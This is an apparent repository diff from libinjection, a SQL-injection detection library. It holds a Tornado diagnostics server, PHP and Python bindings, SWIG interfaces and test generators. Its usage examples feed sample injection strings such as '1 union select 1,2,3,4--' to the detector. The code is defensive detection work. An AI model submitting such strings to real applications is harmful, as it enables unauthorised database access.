title='libjection sqli token parsing diagnostics',
version = libinjection.version(),
parsed=parsed,
formvalue=val,
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
def get_fingerprints(self):
#unquote = urllib.unquote
#detectsqli = libinjection.detectsqli
ids = self.request.arguments.get('id', [])
if len(ids) == 1:
formvalue = ids[0]
else:
formvalue = ''
args = []
extra = {}
qssqli = False
sqlstate = libinjection.sqli_state()
allfp = {}
for name,values in self.request.arguments.iteritems():
if name == 'type':
continue
fps = []
val = values[0]
val = urllib.unquote(val)
if len(val) == 0:
continue
libinjection.sqli_init(sqlstate, val, 0)
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['unquoted', 'ansi', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_MYSQL)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['unquoted', 'mysql', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_ANSI)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['single', 'ansi', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_SINGLE | libinjection.FLAG_SQL_MYSQL)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['single', 'mysql', issqli, pat])
pat = libinjection.sqli_fingerprint(sqlstate, libinjection.FLAG_QUOTE_DOUBLE | libinjection.FLAG_SQL_MYSQL)
issqli = bool(libinjection.sqli_blacklist(sqlstate) and libinjection.sqli_not_whitelist(sqlstate))
fps.append(['double', 'mysql', issqli, pat])
allfp[name] = {
'value': breakify(breakapart(val)),
'fingerprints': fps
}
for name,values in self.request.arguments.iteritems():
if name == 'type':
continue
for val in values:
# do it one more time include cut-n-paste was already url-encoded
val = urllib.unquote(val)
if len(val) == 0:
continue
# swig returns 1/0, convert to True False
libinjection.sqli_init(sqlstate, val, 0)
issqli = bool(libinjection.is_sqli(sqlstate))
# True if any issqli values are true
qssqli = qssqli or issqli
val = breakapart(val)
pat = sqlstate.fingerprint
if not issqli:
pat = 'see below'
args.append([name, val, issqli, pat])
self.add_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.add_header('Pragma', 'no-cache')
self.add_header('Expires', '0')
self.add_header('X-Content-Type-Options', 'nosniff')
self.add_header('X-XSS-Protection', '0')
self.render("form.html",
title='libjection sqli diagnostic',
version = libinjection.version(),
is_sqli=qssqli,
args=args,
allfp = allfp,
formvalue=formvalue,
ssl_protocol=self.request.headers.get('X-SSL-Protocol', ''),
ssl_cipher=self.request.headers.get('X-SSL-Cipher', '')
)
import os
settings = {
"static_path": os.path.join(os.path.dirname(__file__), "static"),
"template_path": os.path.join(os.path.dirname(__file__), "."),
"xsrf_cookies": False,
"gzip": False
}
application = tornado.web.Application([
(r"/diagnostics", NullHandler),
(r'/xsstest', XssTestHandler),
(r'/bootstrap/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/bootstrap' }),
(r'/jquery/(.*)', tornado.web.StaticFileHandler, {'path': '/opt/jquery' }),
(r'/robots.txt', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
(r'/favicon.ico', tornado.web.StaticFileHandler, {'path': os.path.join(os.path.dirname(__file__), "static")}),
(r"/([a-z-]*)", PageHandler)
], **settings)
if __name__ == "__main__":
tornado.options.parse_command_line()
logging.basicConfig(level=logging.DEBUG, format="%(asctime)s %(process)d %(message)s")
application.listen(8888)
tornado.ioloop.IOLoop.instance().start()

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.9 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.2 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.1 KiB

View file

@ -0,0 +1,2 @@
User-agent: *
Disallow:

View file

@ -0,0 +1,13 @@
dnl based on
dnl http://www.php.net/manual/en/internals2.buildsys.configunix.php
PHP_ARG_ENABLE(libinjection, for libinjection support,
[ --enable-libinjection Include libinjection])
dnl Check whether the extension is enabled at all
if test "$PHP_LIBINJECTION" != "no"; then
dnl Finally, tell the build system about the extension and what files are needed
PHP_NEW_EXTENSION(libinjection, libinjection_sqli.c libinjection_wrap.c, $ext_shared)
PHP_SUBST(LIBINJECTION_SHARED_LIBADD)
fi

View file

@ -0,0 +1,25 @@
<?php
// add to your ini file:
// extension=YOUR DIRECTORY//libinjection.so
echo "Using libinjection " . LIBINJECTION_VERSION . "\n";
// make a state object .. can be reused
$x = new_libinjection_sqli_state();
// pass it in to init
// arg 1 -- state objection above
// arg 2 -- php string of input -- MUST BE URL-DECODED
// arg 3 -- flags -- just pass in '0' for now
$input = "1 union select 1,2,3,4--";
libinjection_sqli_init($x, $input, 0);
// do a test
$sqli = libinjection_is_sqli($x);
if ($sqli == 1) {
echo "sqli with fingerprint " . libinjection_sqli_state_fingerprint_get($x) . "\n";
} else {
echo "not sqli";
}

136
libinjection/php/gentests.py Executable file
View file

@ -0,0 +1,136 @@
#!/usr/bin/env python
"""
Takes testing files and turns them PHP module tests
"""
import glob
import os
def phpescape(s):
"""
escapes plain text into php-code
"""
return s.replace("\\", "\\\\").replace("$", "\\$")
def readtestdata(filename):
"""
Read a test file and split into components
"""
state = None
info = {
'--TEST--': '',
'--INPUT--': '',
'--EXPECTED--': ''
}
for line in open(filename, 'r'):
line = line.rstrip()
if line in ('--TEST--', '--INPUT--', '--EXPECTED--'):
state = line
elif state:
info[state] += line + '\n'
# remove last newline from input
info['--INPUT--'] = info['--INPUT--'][0:-1]
return (info['--TEST--'], info['--INPUT--'].strip(), info['--EXPECTED--'].strip())
def gentest_tokens():
"""
generate token phpt test
"""
for testname in sorted(glob.glob('../tests/test-tokens-*.txt')):
data = readtestdata(os.path.join('../tests', testname))
testname = os.path.basename(testname)
phpt = """
--TEST--
{1}
--FILE--
<?php
require(sprintf("%s/../testsupport.php", dirname(__FILE__)));
$sqlistate = new_libinjection_sqli_state();
$s = <<<EOT
{2}
EOT;
$s = trim($s);
libinjection_sqli_init($sqlistate, $s, FLAG_QUOTE_NONE | FLAG_SQL_ANSI);
while (libinjection_sqli_tokenize($sqlistate)) {{
echo(print_token(libinjection_sqli_state_current_get($sqlistate)) . "\\n");
}}
--EXPECT--
{3}
"""
phpt = phpt.format(testname, data[0], phpescape(data[1]), data[2])
with open('build/tests/' + testname.replace('.txt', '.phpt'), 'w') as fd:
fd.write(phpt.strip())
def gentest_folding():
for testname in sorted(glob.glob('../tests/test-folding-*.txt')):
data = readtestdata(os.path.join('../tests', testname))
testname = os.path.basename(testname)
phpt = """
--TEST--
{1}
--FILE--
<?php
require(sprintf("%s/../testsupport.php", dirname(__FILE__)));
$sqlistate = new_libinjection_sqli_state();
$s = <<<EOT
{2}
EOT;
$s = trim($s);
libinjection_sqli_init($sqlistate, $s, FLAG_QUOTE_NONE | FLAG_SQL_ANSI);
$fingerprint = libinjection_sqli_fingerprint($sqlistate, FLAG_QUOTE_NONE | FLAG_SQL_ANSI);
for ($i = 0; $i < strlen($fingerprint); $i++) {{
echo(print_token(libinjection_sqli_get_token($sqlistate, $i)) . "\\n");
}}
--EXPECT--
{3}
"""
phpt = phpt.format(testname, data[0], phpescape(data[1]), data[2])
with open('build/tests/' + testname.replace('.txt', '.phpt'), 'w') as fd:
fd.write(phpt.strip())
def gentest_fingerprints():
"""
generate phpt for testing sqli testing
"""
for testname in sorted(glob.glob('../tests/test-sqli-*.txt')):
data = readtestdata(os.path.join('../tests', testname))
testname = os.path.basename(testname)
phpt = """
--TEST--
{0}
--DESCRIPTION--
{1}
--FILE--
<?php
require(sprintf("%s/../testsupport.php", dirname(__FILE__)));
$sqlistate = new_libinjection_sqli_state();
$s = <<<EOT
{2}
EOT;
$s = trim($s);
libinjection_sqli_init($sqlistate, $s, FLAG_QUOTE_NONE | FLAG_SQL_ANSI);
$ok = libinjection_is_sqli($sqlistate);
if ($ok == 1) {{
echo(libinjection_sqli_state_fingerprint_get($sqlistate) . "\n");
}}
--EXPECT--
{3}
"""
phpt = phpt.format(testname, data[0], phpescape(data[1]), data[2])
with open('build/tests/' + testname.replace('.txt', '.phpt'), 'w') as fd:
fd.write(phpt.strip())
if __name__ == '__main__':
gentest_tokens()
gentest_folding()
gentest_fingerprints()

53
libinjection/php/json2php.py Executable file
View file

@ -0,0 +1,53 @@
#!/usr/bin/env python
#
# Copyright 2012, 2013 Nick Galbreath
# nickg@client9.com
# BSD License -- see COPYING.txt for details
#
"""
Converts a libinjection JSON data file to PHP array
"""
def toc(obj):
""" main routine """
print """<?php
function lookup($state, $stype, $keyword) {
$keyword = struper(keyword);
if ($stype == libinjection.LOOKUP_FINGERPRINT) {
if ($keyword == $fingerprints && libinjection.sqli_not_whitelist($state)) {
return 'F';
} else {
return chr(0);
}
}
return $words.get(keyword, chr(0));
}
"""
words = {}
keywords = obj['keywords']
for k,v in keywords.iteritems():
words[str(k)] = str(v)
print '$words = array('
for k in sorted(words.keys()):
print "'{0}' => '{1}',".format(k, words[k])
print ');\n'
keywords = obj['fingerprints']
print '$fingerprints = array('
for k in sorted(keywords):
print "'{0}',".format(k.upper())
print ');'
return 0
if __name__ == '__main__':
import sys
import json
sys.exit(toc(json.load(sys.stdin)))

View file

@ -0,0 +1,18 @@
/* libinjection.i SWIG interface file for PHP */
%module libinjection
%{
#include "libinjection.h"
#include "libinjection_sqli.h"
struct libinjection_sqli_token * libinjection_sqli_state_tokenvec_geti(sfilter* sf, int i) {
return &(sf->tokenvec[i]);
}
%}
%include "typemaps.i"
// automatically append string length into arg array
%apply (char *STRING, size_t LENGTH) { (const char *s, size_t slen) };
%include "libinjection.h"
%include "libinjection_sqli.h"

View file

@ -0,0 +1,35 @@
<?php
function print_token($tok) {
$tt = libinjection_sqli_token_type_get($tok);
$out = '';
$out .= $tt;
$out .= ' ';
if ($tt == 's') {
$out .= print_token_string($tok);
} else if ($tt == 'v') {
$vc = libinjection_sqli_token_count_get($tok);
if ($vc == 1) {
$out .= '@';
} else if ($vc == 2) {
$out .= '@@';
}
$out .= print_token_string($tok);
} else {
$out .= libinjection_sqli_token_val_get($tok);
}
return trim($out);
}
function print_token_string($tok) {
$out = '';
$quote = libinjection_sqli_token_str_open_get($tok);
if ($quote != "\0") {
$out .= $quote;
}
$out .= libinjection_sqli_token_val_get($tok);
$quote = libinjection_sqli_token_str_close_get($tok);
if ($quote != "\0") {
$out .= $quote;
}
return $out;
}

58
libinjection/python/apitest.py Executable file
View file

@ -0,0 +1,58 @@
#!/usr/bin/python
"""
Work-in-progress
"""
from libinjection import *
from words import words
print dir(libinjection)
def print_token_string(tok):
"""
returns the value of token, handling opening and closing quote characters
"""
out = ''
if tok.str_open != "\0":
out += tok.str_open
out += tok.val
if tok.str_close != "\0":
out += tok.str_close
return out
def print_token(tok):
"""
prints a token for use in unit testing
"""
out = ''
out += tok.type
out += ' '
if tok.type == 's':
out += print_token_string(tok)
elif tok.type == 'v':
vc = tok.count;
if vc == 1:
out += '@'
elif vc == 2:
out += '@@'
out += print_token_string(tok)
else:
out += tok.val
return out
def lookup(state, stype, keyword):
keyword = keyword.upper()
if stype == 'v':
keyword = '0' + keyword
ch = words.get(keyword, '')
return ch
sqli = '1 union all select 1 --'
s = sqli_state()
sqli_init(s, sqli, libinjection.FLAG_QUOTE_NONE | libinjection.FLAG_SQL_ANSI)
sqli_callback(s, lookup)
while sqli_tokenize(s):
print print_token(s.current)

View file

@ -0,0 +1,52 @@
#!/usr/bin/env python
#
# Copyright 2012, 2013 Nick Galbreath
# nickg@client9.com
# BSD License -- see COPYING.txt for details
#
"""
Converts a libinjection JSON data file to python dict
"""
def toc(obj):
""" main routine """
print """
import libinjection
def lookup(state, stype, keyword):
keyword = keyword.upper()
if stype == libinjection.LOOKUP_FINGERPRINT:
if keyword in fingerprints and libinjection.sqli_not_whitelist(state):
return 'F'
else:
return chr(0)
return words.get(keyword, chr(0))
"""
words = {}
keywords = obj['keywords']
for k,v in keywords.iteritems():
words[str(k)] = str(v)
print 'words = {'
for k in sorted(words.keys()):
print "'{0}': '{1}',".format(k, words[k])
print '}\n'
keywords = obj['fingerprints']
print 'fingerprints = set(['
for k in sorted(keywords):
print "'{0}',".format(k.upper())
print '])'
return 0
if __name__ == '__main__':
import sys
import json
sys.exit(toc(json.load(sys.stdin)))

View file

@ -0,0 +1 @@
from libinjection import *

View file

@ -0,0 +1,81 @@
/* libinjection.i SWIG interface file */
%module libinjection
%{
#include "libinjection.h"
#include "libinjection_sqli.h"
#include <stddef.h>
/* This is the callback function that runs a python function
*
*/
static char libinjection_python_check_fingerprint(sfilter* sf, int lookuptype, const char* word, size_t len)
{
PyObject *fp;
PyObject *arglist;
PyObject *result;
const char* strtype;
char ch;
// get sfilter->pattern
// convert to python string
fp = SWIG_InternalNewPointerObj((void*)sf, SWIGTYPE_p_libinjection_sqli_state,0);
arglist = Py_BuildValue("(Nis#)", fp, lookuptype, word, len);
// call pyfunct with string arg
result = PyObject_CallObject((PyObject*) sf->userdata, arglist);
Py_DECREF(arglist);
if (result == NULL) {
printf("GOT NULL\n");
// python call has an exception
// pass it back
ch = '\0';
} else {
// convert value of python call to a char
strtype = PyString_AsString(result);
ch = strtype[0];
Py_DECREF(result);
}
return ch;
}
%}
%include "typemaps.i"
// The C functions all start with 'libinjection_' as a namespace
// We don't need this since it's in the libinjection python package
// i.e. libinjection.libinjection_is_sqli --> libinjection.is_sqli
//
%rename("%(strip:[libinjection_])s") "";
// SWIG doesn't natively support fixed sized arrays.
// this typemap converts the fixed size array sfilter.tokevec
// into a list of pointers to stoken_t types. In otherword this code makes this example work
// s = sfilter()
// libinjection_is_sqli(s, "a string",...)
// for i in len(s.pat):
// print s.tokevec[i].val
//
%typemap(out) stoken_t [ANY] {
int i;
$result = PyList_New($1_dim0);
for (i = 0; i < $1_dim0; i++) {
PyObject *o = SWIG_NewPointerObj((void*)(& $1[i]), SWIGTYPE_p_stoken_t,0);
PyList_SetItem($result,i,o);
}
}
// automatically append string length into arg array
%apply (char *STRING, size_t LENGTH) { (const char *s, size_t slen) };
%typemap(in) (ptr_lookup_fn fn, void* userdata) {
if ($input == Py_None) {
$1 = NULL;
$2 = NULL;
} else {
$1 = libinjection_python_check_fingerprint;
$2 = $input;
}
}
%include "libinjection.h"
%include "libinjection_sqli.h"

View file

@ -0,0 +1,4 @@
sqli_fingerprints = set([
'1234'
])

Some files were not shown because too many files have changed in this diff Show more